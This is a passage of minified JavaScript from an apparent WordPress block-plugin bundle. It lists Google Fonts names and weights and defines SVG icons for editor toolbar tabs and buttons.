New",v:[400,500,600,700],f:"serif"},{n:"Schoolbell",v:[400],f:"handwriting"},{n:"Scope One",v:[400],f:"serif"},{n:"Seaweed Script",v:[400],f:"display"},{n:"Secular One",v:[400],f:"sans-serif"},{n:"Sedgwick Ave",v:[400],f:"handwriting"},{n:"Sedgwick Ave Display",v:[400],f:"handwriting"},{n:"Sen",v:[400,700,800],f:"sans-serif"},{n:"Send Flowers",v:[400],f:"handwriting"},{n:"Sevillana",v:[400],f:"display"},{n:"Seymour One",v:[400],f:"sans-serif"},{n:"Shadows Into Light",v:[400],f:"handwriting"},{n:"Shadows Into Light Two",v:[400],f:"handwriting"},{n:"Shalimar",v:[400],f:"handwriting"},{n:"Shanti",v:[400],f:"sans-serif"},{n:"Share",v:[400,"400i",700,"700i"],f:"display"},{n:"Share Tech",v:[400],f:"sans-serif"},{n:"Share Tech Mono",v:[400],f:"monospace"},{n:"Shippori Antique",v:[400],f:"sans-serif"},{n:"Shippori Antique B1",v:[400],f:"sans-serif"},{n:"Shippori Mincho",v:[400,500,600,700,800],f:"serif"},{n:"Shippori Mincho B1",v:[400,500,600,700,800],f:"serif"},{n:"Shojumaru",v:[400],f:"display"},{n:"Short Stack",v:[400],f:"handwriting"},{n:"Shrikhand",v:[400],f:"display"},{n:"Siemreap",v:[400],f:"display"},{n:"Sigmar One",v:[400],f:"display"},{n:"Signika",v:["300",400,500,600,700],f:"sans-serif"},{n:"Signika Negative",v:["300",400,500,600,700],f:"sans-serif"},{n:"Simonetta",v:[400,"400i",900,"900i"],f:"display"},{n:"Single Day",v:[400],f:"display"},{n:"Sintony",v:[400,700],f:"sans-serif"},{n:"Sirin Stencil",v:[400],f:"display"},{n:"Six Caps",v:[400],f:"sans-serif"},{n:"Skranji",v:[400,700],f:"display"},{n:"Slabo 13px",v:[400],f:"serif"},{n:"Slabo 27px",v:[400],f:"serif"},{n:"Slackey",v:[400],f:"display"},{n:"Smokum",v:[400],f:"display"},{n:"Smooch",v:[400],f:"handwriting"},{n:"Smooch Sans",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Smythe",v:[400],f:"display"},{n:"Sniglet",v:[400,800],f:"display"},{n:"Snippet",v:[400],f:"sans-serif"},{n:"Snowburst One",v:[400],f:"display"},{n:"Sofadi One",v:[400],f:"display"},{n:"Sofia",v:[400],f:"handwriting"},{n:"Solway",v:["300",400,500,700,800],f:"serif"},{n:"Song Myung",v:[400],f:"serif"},{n:"Sonsie One",v:[400],f:"display"},{n:"Sora",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Sorts Mill Goudy",v:[400,"400i"],f:"serif"},{n:"Source Code Pro",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"monospace"},{n:"Source Sans 3",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Source Sans Pro",v:["200","200i","300","300i",400,"400i",600,"600i",700,"700i",900,"900i"],f:"sans-serif"},{n:"Source Serif 4",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Source Serif Pro",v:["200","200i","300","300i",400,"400i",600,"600i",700,"700i",900,"900i"],f:"serif"},{n:"Space Grotesk",v:["300",400,500,600,700],f:"sans-serif"},{n:"Space Mono",v:[400,"400i",700,"700i"],f:"monospace"},{n:"Special Elite",v:[400],f:"display"},{n:"Spectral",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"serif"},{n:"Spectral SC",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"serif"},{n:"Spicy Rice",v:[400],f:"display"},{n:"Spinnaker",v:[400],f:"sans-serif"},{n:"Spirax",v:[400],f:"display"},{n:"Spline Sans",v:["300",400,500,600,700],f:"sans-serif"},{n:"Squada One",v:[400],f:"display"},{n:"Square Peg",v:[400],f:"handwriting"},{n:"Sree Krushnadevaraya",v:[400],f:"serif"},{n:"Sriracha",v:[400],f:"handwriting"},{n:"Srisakdi",v:[400,700],f:"display"},{n:"Staatliches",v:[400],f:"display"},{n:"Stalemate",v:[400],f:"handwriting"},{n:"Stalinist One",v:[400],f:"display"},{n:"Stardos Stencil",v:[400,700],f:"display"},{n:"Stick",v:[400],f:"sans-serif"},{n:"Stick No Bills",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Stint Ultra Condensed",v:[400],f:"display"},{n:"Stint Ultra Expanded",v:[400],f:"display"},{n:"Stoke",v:["300",400],f:"serif"},{n:"Strait",v:[400],f:"sans-serif"},{n:"Style Script",v:[400],f:"handwriting"},{n:"Stylish",v:[400],f:"sans-serif"},{n:"Sue Ellen Francisco",v:[400],f:"handwriting"},{n:"Suez One",v:[400],f:"serif"},{n:"Sulphur Point",v:["300",400,700],f:"sans-serif"},{n:"Sumana",v:[400,700],f:"serif"},{n:"Sunflower",v:["300",500,700],f:"sans-serif"},{n:"Sunshiney",v:[400],f:"handwriting"},{n:"Supermercado One",v:[400],f:"display"},{n:"Sura",v:[400,700],f:"serif"},{n:"Suranna",v:[400],f:"serif"},{n:"Suravaram",v:[400],f:"serif"},{n:"Suwannaphum",v:["100","300",400,700,900],f:"serif"},{n:"Swanky and Moo Moo",v:[400],f:"handwriting"},{n:"Syncopate",v:[400,700],f:"sans-serif"},{n:"Syne",v:[400,500,600,700,800],f:"sans-serif"},{n:"Syne Mono",v:[400],f:"monospace"},{n:"Syne Tactile",v:[400],f:"display"},{n:"Schibsted Grotesk",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Shantell Sans",v:[300,400,500,600,700,800,"300i","400i","500i","600i","700i","800i"],f:"display"},{n:"Sigmar",v:[400],f:"display"},{n:"Silkscreen",v:[400,700],f:"display"},{n:"Slackside One",v:[400],f:"handwriting"},{n:"Sofia Sans",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Sofia Sans Condensed",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Sofia Sans Extra Condensed",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Sofia Sans Semi Condensed",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Solitreo",v:[400],f:"handwriting"},{n:"Sono",v:[200,300,400,500,600,700,800],f:"sans-serif"},{n:"Splash",v:[400],f:"handwriting"},{n:"Spline Sans Mono",v:[300,400,500,600,700,"300i","400i","500i","600i","700i"],f:"monospace"},{n:"Tajawal",v:["200","300",400,500,700,800,900],f:"sans-serif"},{n:"Tangerine",v:[400,700],f:"handwriting"},{n:"Tapestry",v:[400],f:"handwriting"},{n:"Taprom",v:[400],f:"display"},{n:"Tauri",v:[400],f:"sans-serif"},{n:"Taviraj",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"serif"},{n:"Teko",v:["300",400,500,600,700],f:"sans-serif"},{n:"Telex",v:[400],f:"sans-serif"},{n:"Tenali Ramakrishna",v:[400],f:"sans-serif"},{n:"Tenor Sans",v:[400],f:"sans-serif"},{n:"Text Me One",v:[400],f:"sans-serif"},{n:"Texturina",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Thasadith",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"The Girl Next Door",v:[400],f:"handwriting"},{n:"The Nautigal",v:[400,700],f:"handwriting"},{n:"Tienne",v:[400,700,900],f:"serif"},{n:"Tillana",v:[400,500,600,700,800],f:"handwriting"},{n:"Timmana",v:[400],f:"sans-serif"},{n:"Tinos",v:[400,"400i",700,"700i"],f:"serif"},{n:"Titan One",v:[400],f:"display"},{n:"Titillium Web",v:["200","200i","300","300i",400,"400i",600,"600i",700,"700i",900],f:"sans-serif"},{n:"Tomorrow",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Tourney",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"display"},{n:"Trade Winds",v:[400],f:"display"},{n:"Train One",v:[400],f:"display"},{n:"Trirong",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"serif"},{n:"Trispace",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Trocchi",v:[400],f:"serif"},{n:"Trochut",v:[400,"400i",700],f:"display"},{n:"Truculenta",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Trykker",v:[400],f:"serif"},{n:"Tulpen One",v:[400],f:"display"},{n:"Turret Road",v:["200","300",400,500,700,800],f:"display"},{n:"Twinkle Star",v:[400],f:"handwriting"},{n:"Tai Heritage Pro",v:[400,700],f:"serif"},{n:"Tilt Neon",v:[400],f:"display"},{n:"Tilt Prism",v:[400],f:"display"},{n:"Tilt Warp",v:[400],f:"display"},{n:"Tiro Bangla",v:[400,"400i"],f:"serif"},{n:"Tiro Devanagari Hindi",v:[400,"400i"],f:"serif"},{n:"Tiro Devanagari Marathi",v:[400,"400i"],f:"serif"},{n:"Tiro Devanagari Sanskrit",v:[400,"400i"],f:"serif"},{n:"Tiro Gurmukhi",v:[400,"400i"],f:"serif"},{n:"Tiro Kannada",v:[400,"400i"],f:"serif"},{n:"Tiro Tamil",v:[400,"400i"],f:"serif"},{n:"Tiro Telugu",v:[400,"400i"],f:"serif"},{n:"Tsukimi Rounded",v:[300,400,500,600,700],f:"sans-serif"},{n:"Ubuntu",v:["300","300i",400,"400i",500,"500i",700,"700i"],f:"sans-serif"},{n:"Ubuntu Condensed",v:[400],f:"sans-serif"},{n:"Ubuntu Mono",v:[400,"400i",700,"700i"],f:"monospace"},{n:"Uchen",v:[400],f:"serif"},{n:"Ultra",v:[400],f:"serif"},{n:"Uncial Antiqua",v:[400],f:"display"},{n:"Underdog",v:[400],f:"display"},{n:"Unica One",v:[400],f:"display"},{n:"UnifrakturCook",v:[700],f:"display"},{n:"UnifrakturMaguntia",v:[400],f:"display"},{n:"Unkempt",v:[400,700],f:"display"},{n:"Unlock",v:[400],f:"display"},{n:"Unna",v:[400,"400i",700,"700i"],f:"serif"},{n:"Updock",v:[400],f:"handwriting"},{n:"Urbanist",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Unbounded",v:[200,300,400,500,600,700,800,900],f:"display"},{n:"VT323",v:[400],f:"monospace"},{n:"Vampiro One",v:[400],f:"display"},{n:"Varela",v:[400],f:"sans-serif"},{n:"Varela Round",v:[400],f:"sans-serif"},{n:"Varta",v:["300",400,500,600,700],f:"sans-serif"},{n:"Vast Shadow",v:[400],f:"display"},{n:"Vazirmatn",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Vesper Libre",v:[400,500,700,900],f:"serif"},{n:"Viaoda Libre",v:[400],f:"display"},{n:"Vibes",v:[400],f:"display"},{n:"Vibur",v:[400],f:"handwriting"},{n:"Vidaloka",v:[400],f:"serif"},{n:"Viga",v:[400],f:"sans-serif"},{n:"Voces",v:[400],f:"display"},{n:"Volkhov",v:[400,"400i",700,"700i"],f:"serif"},{n:"Vollkorn",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Vollkorn SC",v:[400,600,700,900],f:"serif"},{n:"Voltaire",v:[400],f:"sans-serif"},{n:"Vujahday Script",v:[400],f:"handwriting"},{n:"Vina Sans",v:[400],f:"display"},{n:"Waiting for the Sunrise",v:[400],f:"handwriting"},{n:"Wallpoet",v:[400],f:"display"},{n:"Walter Turncoat",v:[400],f:"handwriting"},{n:"Warnes",v:[400],f:"display"},{n:"Water Brush",v:[400],f:"handwriting"},{n:"Waterfall",v:[400],f:"handwriting"},{n:"Wellfleet",v:[400],f:"display"},{n:"Wendy One",v:[400],f:"sans-serif"},{n:"Whisper",v:[400],f:"handwriting"},{n:"WindSong",v:[400,500],f:"handwriting"},{n:"Wire One",v:[400],f:"sans-serif"},{n:"Work Sans",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Wix Madefor Display",v:[400,500,600,700,800],f:"sans-serif"},{n:"Wix Madefor Text",v:[400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"sans-serif"},{n:"Xanh Mono",v:[400,"400i"],f:"monospace"},{n:"Yaldevi",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Yanone Kaffeesatz",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Yantramanav",v:["100","300",400,500,700,900],f:"sans-serif"},{n:"Yatra One",v:[400],f:"display"},{n:"Yellowtail",v:[400],f:"handwriting"},{n:"Yeon Sung",v:[400],f:"display"},{n:"Yeseva One",v:[400],f:"display"},{n:"Yesteryear",v:[400],f:"handwriting"},{n:"Yomogi",v:[400],f:"handwriting"},{n:"Yrsa",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"serif"},{n:"Yuji Boku",v:[400],f:"serif"},{n:"Yuji Mai",v:[400],f:"serif"},{n:"Yuji Syuku",v:[400],f:"serif"},{n:"Yusei Magic",v:[400],f:"sans-serif"},{n:"Ysabeau",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"ZCOOL KuaiLe",v:[400],f:"sans-serif"},{n:"ZCOOL QingKe HuangYou",v:[400],f:"sans-serif"},{n:"ZCOOL XiaoWei",v:[400],f:"sans-serif"},{n:"Zen Antique",v:[400],f:"serif"},{n:"Zen Antique Soft",v:[400],f:"serif"},{n:"Zen Dots",v:[400],f:"display"},{n:"Zen Kaku Gothic Antique",v:["300",400,500,700,900],f:"sans-serif"},{n:"Zen Kaku Gothic New",v:["300",400,500,700,900],f:"sans-serif"},{n:"Zen Kurenaido",v:[400],f:"sans-serif"},{n:"Zen Loop",v:[400,"400i"],f:"display"},{n:"Zen Maru Gothic",v:["300",400,500,700,900],f:"sans-serif"},{n:"Zen Old Mincho",v:[400,500,600,700,900],f:"serif"},{n:"Zen Tokyo Zoo",v:[400],f:"display"},{n:"Zeyada",v:[400],f:"handwriting"},{n:"Zhi Mang Xing",v:[400],f:"handwriting"},{n:"Zilla Slab",v:["300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"serif"},{n:"Zilla Slab Highlight",v:[400,700],f:"display"}]},7763:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(7294);const r={};r.left=(0,a.createElement)("svg",{width:24,height:24,xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M4 19.8h8.9v-1.5H4v1.5zm8.9-15.6H4v1.5h8.9V4.2zm-8.9 7v1.5h16v-1.5H4z"})),r.center=(0,a.createElement)("svg",{width:24,height:24,xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M16.4 4.2H7.6v1.5h8.9V4.2zM4 11.2v1.5h16v-1.5H4zm3.6 8.6h8.9v-1.5H7.6v1.5z"})),r.right=(0,a.createElement)("svg",{width:24,height:24,xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11.1 19.8H20v-1.5h-8.9v1.5zm0-15.6v1.5H20V4.2h-8.9zM4 12.8h16v-1.5H4v1.5z"})),r.spacing=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:24,height:24,fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"#1E1E1E",strokeWidth:"1.5",d:"m10 8-3.3 3.3a1 1 0 0 0 0 1.4L10 16m4-8 3.3 3.3a1 1 0 0 1 0 1.4L14 16m-7.59-4H17.6M20 4v16M4 4v16"})),r.updateLink=(0,a.createElement)("svg",{style:{height:"20px",width:"20px"},xmlns:"http://www.w3.org/2000/svg",width:"20",height:"20",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fill:"#070707",fillRule:"evenodd",d:"M12.95 2.93a5.75 5.75 0 0 1 8.13 8.13v.01l-3 3a5.75 5.75 0 0 1-8.68-.62.75.75 0 0 1 1.2-.9 4.25 4.25 0 0 0 6.41.46l3-3a4.25 4.25 0 0 0-6.02-6l-1.71 1.7a.75.75 0 1 1-1.06-1.06l1.73-1.72Z",clipRule:"evenodd"}),(0,a.createElement)("path",{fill:"#070707",fillRule:"evenodd",d:"M7.99 8.6a5.75 5.75 0 0 1 6.61 1.95.75.75 0 1 1-1.2.9 4.25 4.25 0 0 0-6.41-.46l-3 3a4.25 4.25 0 0 0 6.01 6l1.71-1.7a.75.75 0 0 1 1.06 1.06l-1.72 1.72a5.75 5.75 0 0 1-8.13-8.13l.01-.01 3-3a5.75 5.75 0 0 1 2.06-1.32Z",clipRule:"evenodd"})),r.addSubmenu=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"16",height:"16",fill:"none",viewBox:"0 0 16 16"},(0,a.createElement)("g",{fill:"#070707",fillRule:"evenodd",clipPath:"url(#a)",clipRule:"evenodd"},(0,a.createElement)("path",{d:"M.17 2C.17.99.99.17 2 .17h12c1.01 0 1.83.82 1.83 1.83v1.33c0 1.02-.82 1.84-1.83 1.84H2A1.83 1.83 0 0 1 .17 3.33V2ZM2 1.17a.83.83 0 0 0-.83.83v1.33c0 .46.37.84.83.84h12c.46 0 .83-.38.83-.84V2a.83.83 0 0 0-.83-.83H2ZM5.5 8c0-1.01.82-1.83 1.83-1.83h5.34c1 0 1.83.82 1.83 1.83v.67c0 1-.82 1.83-1.83 1.83H7.33A1.83 1.83 0 0 1 5.5 8.67V8Zm1.83-.83A.83.83 0 0 0 6.5 8v.67c0 .46.37.83.83.83h5.34c.46 0 .83-.37.83-.83V8a.83.83 0 0 0-.83-.83H7.33ZM5.5 13.33c0-1.01.82-1.83 1.83-1.83h5.34c1 0 1.83.82 1.83 1.83V14c0 1.01-.82 1.83-1.83 1.83H7.33A1.83 1.83 0 0 1 5.5 14v-.67Zm1.83-.83a.83.83 0 0 0-.83.83V14c0 .46.37.83.83.83h5.34c.46 0 .83-.37.83-.83v-.67a.83.83 0 0 0-.83-.83H7.33Z"}),(0,a.createElement)("path",{d:"M2.17 13V4.67h1V13c0 .1.07.17.16.17H6.5v1H3.33c-.64 0-1.16-.53-1.16-1.17Z"}),(0,a.createElement)("path",{d:"M2.17 7.83H6.5v1H2.17v-1Z"})),(0,a.createElement)("defs",null,(0,a.createElement)("clipPath",{id:"a"},(0,a.createElement)("path",{fill:"#fff",d:"M0 0h16v16H0z"})))),r.textTab=(0,a.createElement)("span",{className:"ultp-tab-button"},(0,a.createElement)("svg",{width:24,height:24,viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M4 18V6C4 4.89543 4.89543 4 6 4H14.8639C15.3943 4 15.903 4.21071 16.2781 4.58579L19.4142 7.72191C19.7893 8.09698 20 8.60569 20 9.13612V18C20 19.1046 19.1046 20 18 20H6C4.89543 20 4 19.1046 4 18Z",stroke:"#1E1E1E",strokeWidth:"1.5"}),(0,a.createElement)("path",{d:"M8 15H16",stroke:"#1E1E1E",strokeWidth:"1.5"}),(0,a.createElement)("path",{d:"M8 12H16",stroke:"#1E1E1E",strokeWidth:"1.5"}),(0,a.createElement)("path",{d:"M8 9H14",stroke:"#1E1E1E",strokeWidth:"1.5"})),(0,a.createElement)("span",null,"Text")),r.style=(0,a.createElement)("span",{className:"ultp-tab-button"},(0,a.createElement)("svg",{width:24,height:24,viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M19.9753 10C20.1346 11.5 19.6219 12.5 18.6219 13.5C16.6219 15.5 12.5451 14.2091 11.73 15C10.9148 15.791 11.73 16.8594 12.7008 17.4873C14.2468 18.4873 13.7314 19.9873 12.2453 20.0001C7.69166 20.0391 4 16 4 12C4 7.58197 7.69149 4 12.2453 4C16.7991 4 19.7128 7.52818 19.9753 10Z",stroke:"#1E1E1E",strokeWidth:"1.5"}),(0,a.createElement)("circle",{cx:"16.25",cy:"9.25",r:"1.25",fill:"#1E1E1E"}),(0,a.createElement)("path",{d:"M14 7C14 7.69036 13.4404 8.25 12.75 8.25C12.0596 8.25 11.5 7.69036 11.5 7C11.5 6.30964 12.0596 5.75 12.75 5.75C13.4404 5.75 14 6.30964 14 7Z",fill:"#1E1E1E"}),(0,a.createElement)("path",{d:"M10 8.25C10 8.94036 9.44036 9.5 8.75 9.5C8.05964 9.5 7.5 8.94036 7.5 8.25C7.5 7.55964 8.05964 7 8.75 7C9.44036 7 10 7.55964 10 8.25Z",fill:"#1E1E1E"}),(0,a.createElement)("path",{d:"M8.5 12C8.5 12.6904 7.94036 13.25 7.25 13.25C6.55964 13.25 6 12.6904 6 12C6 11.3096 6.55964 10.75 7.25 10.75C7.94036 10.75 8.5 11.3096 8.5 12Z",fill:"#1E1E1E"})),(0,a.createElement)("span",null,"Style")),r.settings3=(0,a.createElement)("span",{className:"ultp-tab-button"},(0,a.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M20.0733 7.98829L19.5027 6.9982C19.02 6.16044 17.9503 5.87144 17.1114 6.35213C16.7121 6.58737 16.2356 6.65411 15.787 6.53764C15.3384 6.42116 14.9546 6.13103 14.7201 5.73123C14.5693 5.47711 14.4882 5.18767 14.4852 4.89218C14.4988 4.41843 14.3201 3.95934 13.9897 3.61951C13.6593 3.27967 13.2055 3.08802 12.7316 3.08821H11.5821C11.1177 3.08821 10.6725 3.27323 10.345 3.60234C10.0175 3.93145 9.83459 4.37752 9.83682 4.84183C9.82306 5.80049 9.04195 6.57039 8.08319 6.57029C7.7877 6.56722 7.49826 6.48617 7.24414 6.33535C6.40523 5.85465 5.33553 6.14366 4.85284 6.98142L4.24033 7.98829C3.75822 8.825 4.04329 9.89403 4.87801 10.3796C5.42059 10.6928 5.75483 11.2718 5.75483 11.8983C5.75483 12.5248 5.42059 13.1037 4.87801 13.417C4.04435 13.8993 3.75897 14.9657 4.24033 15.7999L4.81927 16.7984C5.04543 17.2064 5.42489 17.5076 5.87369 17.6351C6.32248 17.7627 6.8036 17.7061 7.21058 17.478C7.61067 17.2445 8.08743 17.1806 8.5349 17.3003C8.98238 17.4201 9.36347 17.7136 9.59349 18.1157C9.74431 18.3698 9.82536 18.6592 9.82843 18.9547C9.82843 19.9232 10.6136 20.7083 11.5821 20.7083H12.7316C13.6968 20.7083 14.4806 19.9283 14.4852 18.9631C14.4829 18.4973 14.667 18.05 14.9963 17.7206C15.3257 17.3913 15.773 17.2073 16.2388 17.2095C16.5336 17.2174 16.8218 17.2981 17.0779 17.4444C17.9146 17.9265 18.9836 17.6415 19.4692 16.8067L20.0733 15.7999C20.3071 15.3985 20.3713 14.9205 20.2516 14.4717C20.1319 14.0228 19.8382 13.6402 19.4356 13.4086C19.033 13.1769 18.7393 12.7943 18.6196 12.3455C18.4999 11.8967 18.5641 11.4186 18.7979 11.0173C18.95 10.7518 19.1701 10.5317 19.4356 10.3796C20.2653 9.89429 20.5497 8.83151 20.0733 7.99668V7.98829Z",stroke:"#1E1E1E",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M12.1606 14.3147C13.4952 14.3147 14.5771 13.2329 14.5771 11.8983C14.5771 10.5637 13.4952 9.4818 12.1606 9.4818C10.826 9.4818 9.74414 10.5637 9.74414 11.8983C9.74414 13.2329 10.826 14.3147 12.1606 14.3147Z",stroke:"#1E1E1E",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),(0,a.createElement)("span",null,"Settings")),r.add=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:22,height:24,viewBox:"0 0 22 24",fill:"none"},(0,a.createElement)("g",{clipPath:"url(#clip0_16_9344)"},(0,a.createElement)("path",{d:"M15.7131 0.87241C16.6876 0.87241 17.4896 1.67503 17.4896 2.66957V17.6401C17.4896 18.626 16.6962 19.4373 15.7131 19.4373H2.63896C1.66445 19.4373 0.862407 18.6347 0.862407 17.6401V2.66957C0.862407 1.68375 1.65582 0.87241 2.63896 0.87241H15.7131ZM15.7131 0H2.63896C1.1815 0 0 1.1952 0 2.66957V17.6401C0 19.1145 1.1815 20.3097 2.63896 20.3097H15.7131C17.1705 20.3097 18.352 19.1145 18.352 17.6401V2.66957C18.352 1.1952 17.1705 0 15.7131 0Z",fill:"black"}),(0,a.createElement)("path",{d:"M19.2921 10.2683H11.1337C9.63817 10.2683 8.42578 11.4948 8.42578 13.0077V21.2607C8.42578 22.7736 9.63817 24 11.1337 24H19.2921C20.7877 24 22.0001 22.7736 22.0001 21.2607V13.0077C22.0001 11.4948 20.7877 10.2683 19.2921 10.2683Z",fill:"black"}),(0,a.createElement)("path",{d:"M15.7047 13.9934H14.7129V20.2835H15.7047V13.9934Z",fill:"white"}),(0,a.createElement)("path",{d:"M18.3264 16.6282H12.1084V17.6314H18.3264V16.6282Z",fill:"white"})),(0,a.createElement)("defs",null,(0,a.createElement)("clipPath",{id:"clip0_16_9344"},(0,a.createElement)("rect",{width:22,height:24,fill:"white"})))),r.setting=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",role:"img","aria-hidden":"true",focusable:"false"},(0,a.createElement)("path",{d:"M14.5 13.8c-1.1 0-2.1.7-2.4 1.8H4V17h8.1c.3 1 1.3 1.8 2.4 1.8s2.1-.7 2.4-1.8H20v-1.5h-3.1c-.3-1-1.3-1.7-2.4-1.7zM11.9 7c-.3-1-1.3-1.8-2.4-1.8S7.4 6 7.1 7H4v1.5h3.1c.3 1 1.3 1.8 2.4 1.8s2.1-.7 2.4-1.8H20V7h-8.1z"})),r.styleIcon=(0,a.createElement)("svg",{width:24,height:24,viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg",style:{fill:"white"}},(0,a.createElement)("path",{d:"M19.9753 10C20.1346 11.5 19.6219 12.5 18.6219 13.5C16.6219 15.5 12.5451 14.2091 11.73 15C10.9148 15.791 11.73 16.8594 12.7008 17.4873C14.2468 18.4873 13.7314 19.9873 12.2453 20.0001C7.69166 20.0391 4 16 4 12C4 7.58197 7.69149 4 12.2453 4C16.7991 4 19.7128 7.52818 19.9753 10Z",stroke:"#1E1E1E",strokeWidth:"1.5"}),(0,a.createElement)("circle",{cx:"16.25",cy:"9.25",r:"1.25",fill:"#1E1E1E"}),(0,a.createElement)("path",{d:"M14 7C14 7.69036 13.4404 8.25 12.75 8.25C12.0596 8.25 11.5 7.69036 11.5 7C11.5 6.30964 12.0596 5.75 12.75 5.75C13.4404 5.75 14 6.30964 14 7Z",fill:"#1E1E1E"}),(0,a.createElement)("path",{d:"M10 8.25C10 8.94036 9.44036 9.5 8.75 9.5C8.05964 9.5 7.5 8.94036 7.5 8.25C7.5 7.55964 8.05964 7 8.75 7C9.44036 7 10 7.55964 10 8.25Z",fill:"#1E1E1E"}),(0,a.createElement)("path",{d:"M8.5 12C8.5 12.6904 7.94036 13.25 7.25 13.25C6.55964 13.25 6 12.6904 6 12C6 11.3096 6.55964 10.75 7.25 10.75C7.94036 10.75 8.5 11.3096 8.5 12Z",fill:"#1E1E1E"})),r.chatgpt=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",style:{fill:"#10a37f"},width:"25",height:"25.06",viewBox:"0 0 25 25.06"},(0,a.createElement)("path",{"data-name":"Path 146",d:"M24.795 12.941a6.153 6.153 0 0 0-1.519-2.7A6.07 6.07 0 0 0 22.8 5.1a6.327 6.327 0 0 0-6.88-2.917A6.28 6.28 0 0 0 5.139 4.471 6.223 6.223 0 0 0 .846 7.45a6.137 6.137 0 0 0 .862 7.358 6.07 6.07 0 0 0 .479 5.138 6.281 6.281 0 0 0 6.88 2.91A6.278 6.278 0 0 0 19.851 20.6a6.23 6.23 0 0 0 4.293-2.979 6.092 6.092 0 0 0 .651-4.682m-4.888 5.947v-6.22a.639.639 0 0 0-.285-.621L13.913 8.82l2.061-1.17L20.8 10.4a4.636 4.636 0 0 1 2.209 2.854 4.566 4.566 0 0 1-.475 3.517 4.662 4.662 0 0 1-2.185 1.943c-.146.063-.3.122-.446.178M5.083 6.178v6.2a.624.624 0 0 0 .279.622l5.708 3.226L9.011 17.4l-4.852-2.752a4.639 4.639 0 0 1-2.21-2.854 4.562 4.562 0 0 1 .473-3.514 4.687 4.687 0 0 1 1.784-1.736 4.551 4.551 0 0 1 .877-.367m11.268.023a.714.714 0 0 0-.707 0L9.855 9.5V7.1l4.92-2.748a4.79 4.79 0 0 1 6.485 1.721 4.574 4.574 0 0 1 .616 2.648c-.014.19-.039.393-.07.58zm-3.859 3.47 2.637 1.5v2.756l-2.637 1.457-2.631-1.5v-2.741zM8.8 6.067a.684.684 0 0 0-.3.624v6.4l-2.082-1.137V6.587a1.017 1.017 0 0 0 0-.112 4.75 4.75 0 0 1 7.364-3.911 6.33 6.33 0 0 1 .547.412zm-5.614 9.692 5.448 3.1a.713.713 0 0 0 .707 0l5.8-3.294v2.4l-4.927 2.729a4.79 4.79 0 0 